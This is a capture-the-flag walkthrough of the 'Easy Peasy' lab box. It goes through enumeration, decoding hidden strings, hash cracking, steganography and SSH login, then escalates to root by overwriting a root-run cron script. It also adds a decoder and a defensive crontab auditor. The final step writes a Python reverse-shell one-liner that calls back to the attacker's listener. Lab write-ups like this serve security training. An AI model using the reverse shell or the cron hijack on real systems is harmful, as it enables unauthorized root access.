Easy Peasy
Port 80 enumeration - Port 65524 enumeration - Steganography - Encryptions - CronJob PrivEsc
Initial Compromise
Running a simple Nmap scan is not enough to detect all open ports, since two of the services do not sit on standard ports. You’ll need to run Nmap with the -p- flag to discover the 3 running services:
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.16.1
6498/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
65524/tcp open http Apache httpd 2.4.43 ((Ubuntu))
Using gobuster against the Nginx service running on port 80/tcp allows the discovery of a /hidden directory:
kali@kali:/data/Easy_Peasy/files$ gobuster dir -u http://10.10.105.32 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.105.32
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/08/24 10:08:01 Starting gobuster
===============================================================
/hidden (Status: 301)
Further enumerating this directory leads to a /hidden/whatever/ location. Analysis of the page source reveals a hidden paragraph with an encoded string:
kali@kali:/data/Easy_Peasy/files$ curl -s http://10.10.105.32/hidden/whatever/
<!DOCTYPE html>
<html>
<head>
<title>dead end</title>
<style>
body {
background-image: url("https://cdn.pixabay.com/photo/2015/05/18/23/53/norway-772991_960_720.jpg");
background-repeat: no-repeat;
background-size: cover;
width: 35em;
margin: 0 auto;
font-family: Tahoma, Verdana, Arial, sans-serif;
}
</style>
</head>
<body>
<center>
<p hidden>ZmxhZ3tmMXJzN19mbDRnfQ==</p>
</center>
</body>
</html>
The string is base64 encoded:
$ echo -n "ZmxhZ3tmMXJzN19mbDRnfQ==" | base64 -d
flag{REDACTED}
Apache Enumeration
Simply visiting the /robots.txt page gives us:
kali@kali:/data/Easy_Peasy/files$ curl -s http://10.10.105.32:65524/robots.txt
User-Agent:*
Disallow:/
Robots Not Allowed
User-Agent:a18672860d0510e5ab6699730763b250
Allow:/
This Flag Can Enter But Only This Flag No More Exceptions
Two things stand out. First, we'll have to change the User-Agent to a18672860d0510e5ab6699730763b250 to get further. Second, the User-Agent looks fishy; maybe it's an MD5 hash. Yes it is, and it is flag 2 :)
The main page shows a standard Apache page, but hints have been hidden in the source code of that page:
kali@kali:/data/Easy_Peasy/files$ curl -s http://10.10.105.32:65524/ | grep flag
<a href="#flag">hi</a>
Fl4g 3 : flag{REDACTED}
Still in the source code of the main page, we can find a hidden paragraph with an encoded string:
kali@kali:/data/Easy_Peasy/files$ curl -s http://10.10.105.32:65524/ | grep hidden
<p hidden>its encoded with ba....:ObsJmP173N2X6dOrAgEAL0Vu</p>
It decodes to /n0th1ng3ls3m4tt3r with base62.
Browsing the location gathered previously reveals a hash:
kali@kali:/data/Easy_Peasy/files$ curl -s http://10.10.105.32:65524/n0th1ng3ls3m4tt3r/
<html>
<head>
<title>random title</title>
<style>
body {
background-image: url("https://cdn.pixabay.com/photo/2018/01/26/21/20/matrix-3109795_960_720.jpg");
background-color:black;
}
</style>
</head>
<body>
<center>
<img src="binarycodepixabay.jpg" width="140px" height="140px"/>
<p>940d71e8655ac41efb5f8ab850668505b86dd64186a66e57d1483e7f5fe6fd81</p>
</center>
</body>
</html>
Let’s crack this hash with John the Ripper using the wordlist provided in the challenge, easypeasy.txt:
kali@kali:/data/Easy_Peasy/files$ echo "940d71e8655ac41efb5f8ab850668505b86dd64186a66e57d1483e7f5fe6fd81" > hash.txt
kali@kali:/data/Easy_Peasy/files$ /data/src/john/run/john --wordlist=easypeasy.txt --format=GOST hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (gost, GOST R 34.11-94 [64/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
mypasswordforthatjob (?)
1g 0:00:00:00 DONE (2020-08-24 11:27) 5.555g/s 22755p/s 22755c/s 22755C/s mypasswordforthatjob..flash88
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
The page found just previously also contains a jpg file. Let’s download the picture and extract the secret with steghide, using the password cracked just before (mypasswordforthatjob):
kali@kali:/data/Easy_Peasy/files$ wget http://10.10.105.32:65524/n0th1ng3ls3m4tt3r/binarycodepixabay.jpg
kali@kali:/data/Easy_Peasy/files$ steghide extract -sf binarycodepixabay.jpg
Enter passphrase:
wrote extracted data to "secrettext.txt".
kali@kali:/data/Easy_Peasy/files$ cat secrettext.txt
username:boring
password:
01101001 01100011 01101111 01101110 01110110 01100101 01110010 01110100 01100101 01100100 01101101 01111001 01110000 01100001 01110011 01110011 01110111 01101111 01110010 01100100 01110100 01101111 01100010 01101001 01101110 01100001 01110010 01111001
This file gives us a username (boring) and a binary encoded password, which decodes to iconvertedmypasswordtobinary. We can now SSH and get a shell on the box :)
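As an added example (not part of the original writeup), the two non-standard decodings used on this box, base62 for the hidden directory name and 8-bit binary groups for the steghide password, carried out in Python. Base62 has no single standard alphabet, so base62_decode takes the alphabet as a parameter; the default is the 0-9, A-Z, a-z ordering, which is the one that reproduces the path shown above.

```python
# One common base62 ordering: digits, then upper case, then lower case.
# Other tools use 0-9a-zA-Z; the same text decodes to different bytes with it.
BASE62_DIGITS_UPPER_LOWER = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"

# Values copied from the page: the hidden paragraph on port 65524 and the steghide output.
ENCODED_PATH = "ObsJmP173N2X6dOrAgEAL0Vu"
BINARY_PASSWORD = (
    "01101001 01100011 01101111 01101110 01110110 01100101 01110010 01110100 "
    "01100101 01100100 01101101 01111001 01110000 01100001 01110011 01110011 "
    "01110111 01101111 01110010 01100100 01110100 01101111 01100010 01101001 "
    "01101110 01100001 01110010 01111001"
)


def base62_decode(text: str, alphabet: str = BASE62_DIGITS_UPPER_LOWER) -> bytes:
    """Decode base62 as one big integer (the scheme the hidden path uses).

    A pure big-integer scheme cannot express leading zero bytes: a leading '0'
    symbol adds nothing to the value, so such bytes are lost on decode.
    """
    if len(set(alphabet)) != 62:
        raise ValueError("alphabet must contain 62 distinct symbols")
    value = 0
    for ch in text:
        if ch not in alphabet:
            raise ValueError(f"symbol {ch!r} not in alphabet")
        value = value * 62 + alphabet.index(ch)
    if value == 0:
        return b""
    return value.to_bytes((value.bit_length() + 7) // 8, "big")


def decode_binary_octets(text: str) -> str:
    """Turn whitespace-separated 8-bit groups into ASCII text."""
    groups = text.split()
    if any(len(g) != 8 or set(g) - {"0", "1"} for g in groups):
        raise ValueError("expected whitespace-separated 8-bit binary groups")
    return bytes(int(g, 2) for g in groups).decode("ascii")


def decode_hidden_path() -> str:
    """The hidden directory name on the Apache service."""
    return base62_decode(ENCODED_PATH).decode("ascii")


def decode_steghide_password() -> str:
    """The SSH password that steghide revealed, decoded from binary."""
    return decode_binary_octets(BINARY_PASSWORD)


if __name__ == "__main__":
    print(decode_hidden_path())        # /n0th1ng3ls3m4tt3r
    print(decode_steghide_password())  # iconvertedmypasswordtobinary
```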
Privilege Escalation
The user is not in the sudoers, but there is a cron job executed by root:
boring@kral4-PC:~$ sudo -l
[sudo] password for boring:
Sorry, user boring may not run sudo on kral4-PC.
boring@kral4-PC:~$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
* * * * * root cd /var/www/ && sudo bash .mysecretcronjob.sh
The file is owned by our user, so we can modify it:
boring@kral4-PC:~$ ls -l /var/www/.mysecretcronjob.sh
-rwxr-xr-x 1 boring boring 33 Jun 14 22:43 /var/www/.mysecretcronjob.sh
boring@kral4-PC:~$ cat /var/www/.mysecretcronjob.sh
#!/bin/bash
# i will run as root
After overwriting the script with a Python reverse shell pointing back at our listener, it now reads:
boring@kral4-PC:/var/www$ cat .mysecretcronjob.sh
#!/bin/bash
# i will run as root
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.8.50.72",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
Start a listener and get R00T :)
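A defender's check for the weakness used above, as an added example that is not part of the original writeup: it parses system-crontab lines, resolves the script each root job runs (following the cd DIR && pattern seen here) and reports targets owned by a non-root user or writable by group or other. The stat_fn parameter is a hypothetical injection point so the logic can run against a fake filesystem; the sample crontab is constructed after the one shown above.

```python
import os
import re
import shlex
import stat

# Constructed sample modelled on the crontab shown above; not copied from a live host.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
* * * * * root cd /var/www/ && sudo bash .mysecretcronjob.sh
"""


def real_stat(path):
    """(uid, mode) of path from the real filesystem, or None if it does not exist."""
    try:
        st = os.stat(path)
    except OSError:
        return None
    return st.st_uid, st.st_mode


def script_paths(command, cwd="/"):
    """Paths a cron command touches, following 'cd DIR &&' as cron's shell would."""
    paths = []
    for segment in re.split(r"&&|\|\||;", command):
        words = shlex.split(segment)
        if not words:
            continue
        if words[0] == "cd" and len(words) > 1:
            cwd = os.path.join(cwd, words[1])
            continue
        for w in words[1:]:  # arguments only; the interpreter/binary itself is skipped
            if not w.startswith("-") and ("/" in w or w.endswith(".sh")):
                paths.append(os.path.normpath(os.path.join(cwd, w)))
    return paths


def audit_crontab(text, stat_fn=real_stat):
    """Root jobs (five time fields + user) whose target a non-root user controls.

    The owner check matters: the script in this writeup is mode 755, so a scan
    for world-writable files alone would never flag it.
    """
    findings = []
    for line in text.splitlines():
        fields = line.split(None, 6)
        if len(fields) < 7 or fields[0].startswith("#") or "=" in fields[0] or fields[5] != "root":
            continue
        for path in script_paths(fields[6]):
            info = stat_fn(path)
            if info and (info[0] != 0 or info[1] & (stat.S_IWGRP | stat.S_IWOTH)):
                findings.append((path, info[0], oct(info[1] & 0o777)))
    return findings
```

Running audit_crontab(open("/etc/crontab").read()) on a host uses the real filesystem; the same logic applies to each file under /etc/cron.d.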